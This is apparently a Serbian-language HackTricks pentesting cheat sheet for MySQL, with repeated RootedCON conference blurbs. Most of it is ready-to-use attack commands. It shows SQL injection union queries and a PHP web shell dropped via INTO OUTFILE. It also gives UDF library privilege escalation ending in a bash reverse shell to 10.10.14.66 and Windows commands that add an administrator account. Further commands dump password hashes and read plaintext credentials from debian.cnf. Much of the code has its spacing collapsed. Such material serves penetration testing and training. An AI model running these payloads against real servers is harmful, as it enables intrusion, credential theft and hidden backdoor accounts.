RootedCON je najrelevantniji događaj u oblasti kibernetičke bezbednosti u Španiji i jedan od najvažnijih u Evropi. Sa misijom promovisanja tehničkog znanja, ovaj kongres je ključno mesto susreta tehnoloških i bezbednosnih stručnjaka u svakoj disciplini.
Osnovne informacije
MySQL se može opisati kao open source Sistem za upravljanje relacionim bazama podataka (RDBMS) koji je dostupan besplatno. Radi na Structured Query Language (SQL), omogućavajući upravljanje i manipulaciju bazama podataka.
Podrazumevani port: 3306
3306/tcp open mysql
Poveži se
Lokalno
mysql-uroot# Connect to root without passwordmysql-uroot-p# A password will be asked (check someone)
showdatabases;use<database>;connect<database>;showtables;describe<table_name>;showcolumnsfrom<table>;select version(); #versionselect @@version(); #versionselect user(); #Userselect database(); #database name#Get a shell with the mysql client user\!sh#Basic MySQLiUnionSelect1,2,3,4,group_concat(0x7c,table_name,0x7C) frominformation_schema.tablesUnionSelect1,2,3,4,column_namefrominformation_schema.columnswheretable_name="<TABLE NAME>"#Read & Write## Yo need FILE privilege to read & write to files.select load_file('/var/lib/mysql-files/key.txt'); #Read fileselect 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'#Try to change MySQL root passwordUPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';FLUSH PRIVILEGES;quit;
mysql-uusername-p<manycommands.sql#A file with all the commands you want to executemysql-uroot-h127.0.0.1-e'show databases;'
Prikaz Dozvola za MySQL
#MysqlSHOW GRANTS [FOR user];SHOW GRANTS;SHOW GRANTS FOR'root'@'localhost';SHOW GRANTS FORCURRENT_USER();# Get users, permissions & hashesSELECT*FROM mysql.user;#From DBselect*from mysql.user where user='root';## Get users with file_privselect user,file_priv from mysql.user where file_priv='Y';## Get users with Super_privselect user,Super_priv from mysql.user where Super_priv='Y';# List functionsSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION';#@ Functions notfrom sys. dbSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION'AND routine_schema!='sys';
MySQL proizvoljno čitanje datoteke od strane klijenta
Zapravo, kada pokušate učitati lokalne podatke u tabelu, sadržaj datoteke MySQL ili MariaDB server traži klijenta da je pročita i pošalje sadržaj. Zatim, ako možete da promenite mysql klijent da se poveže sa vašim MySQL serverom, možete čitati proizvoljne datoteke.
Molimo vas da primetite da je ovo ponašanje korišćenjem:
(Zapažena je reč "lokalno")
Jer bez "lokalno" možete dobiti:
mysql>loaddatainfile"/etc/passwd"intotabletestFIELDSTERMINATEDBY'\n';ERROR1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
RootedCON je najrelevantniji događaj u oblasti cybersecurity-ja u Španiji i jedan od najvažnijih u Evropi. Sa misijom promovisanja tehničkog znanja, ovaj kongres je ključno mesto susreta tehnoloških i cybersecurity profesionalaca u svakoj disciplini.
U konfiguraciji MySQL usluga, različite postavke se koriste za definisanje njenog rada i sigurnosnih mera:
Postavka user se koristi za određivanje korisnika pod kojim će MySQL usluga biti izvršena.
password se koristi za postavljanje lozinke povezane sa MySQL korisnikom.
admin_address određuje IP adresu koja osluškuje TCP/IP veze na administrativnom mrežnom interfejsu.
Promenljiva debug ukazuje na trenutne konfiguracije za debagovanje, uključujući osetljive informacije unutar logova.
sql_warnings upravlja generisanjem informacionih nizova za INSERT naredbe sa jednim redom kada upozorenja nastanu, uključujući osetljive podatke unutar logova.
Sa secure_file_priv, obim operacija uvoza i izvoza podataka je ograničen radi poboljšanja sigurnosti.
Eskalacija privilegija
# Get current user (an all users) privileges and hashesusemysql;select user();select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;# Get users, permissions & credsSELECT*FROMmysql.user;mysql-uroot--password=<PASSWORD>-e"SELECT * FROM mysql.user;"# Create user and give privilegescreateusertestidentifiedby'test';grantSELECT,CREATE,DROP,UPDATE,DELETE,INSERTon*.*tomysqlidentifiedby'mysql'WITHGRANTOPTION;# Get a shell (with your permissions, usefull for sudo/suid privesc)\!sh
Eskalacija privilegija putem biblioteke
Ako mysql server radi kao root (ili drugi korisnik sa više privilegija) možete ga naterati da izvršava komande. Za to, treba da koristite korisnički definisane funkcije. Da biste kreirali korisnički definisanu funkciju, potrebna vam je biblioteka za OS na kojem se izvršava mysql.
Zlonamerna biblioteka koju možete koristiti može se pronaći unutar sqlmap-a i unutar metasploita pomoću komande locate "*lib_mysqludf_sys*". Datoteke sa ekstenzijom .so su linux biblioteke, a .dll su one za Windows, izaberite onu koja vam je potrebna.
Ako nemate te biblioteke, možete ih ili potražiti, ili preuzeti ovaj linux C kod i kompajlirati ga unutar ranjive linux mašine:
Sada kada imate biblioteku, prijavite se unutar Mysql-a kao privilegovani korisnik (root?) i pratite sledeće korake:
Linux
# Use a databaseuse mysql;# Create a tabletoload the library andmove it to the plugins dircreatetablenpn(line blob);# Load the binary library inside the table## You might need to change the pathandfilenameinsert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));# Get the plugin_dir pathshow variables like'%plugin%';# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/# dumpin there the libraryselect*from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';# Create a functiontoexecute commandscreatefunctionsys_execreturnsinteger soname 'lib_mysqludf_sys.so';# Execute commandsselect sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indicationsUSE mysql;CREATETABLEnpn(line blob);INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));show variables like'%plugin%';SELECT*FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATEFUNCTIONsys_execRETURNSinteger SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user npn npn12345678 /add");SELECT sys_exec("net localgroup Administrators npn /add");
Izdvajanje MySQL kredencijala iz fajlova
Unutar /etc/mysql/debian.cnf možete pronaći plain-text password korisnika debian-sys-maint
cat/etc/mysql/debian.cnf
Možete koristiti ove podatke za prijavljivanje u MySQL bazu podataka.
Unutar fajla: /var/lib/mysql/mysql/user.MYD možete pronaći sve hešove MySQL korisnika (one koje možete izvući iz mysql.user unutar baze podataka).
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
RootedCON je najrelevantniji događaj u oblasti kibernetičke bezbednosti u Španiji i jedan od najvažnijih u Evropi. Sa misijom promovisanja tehničkog znanja, ovaj kongres je ključno mesto susreta tehnoloških i stručnjaka za kibernetičku bezbednost u svakoj disciplini.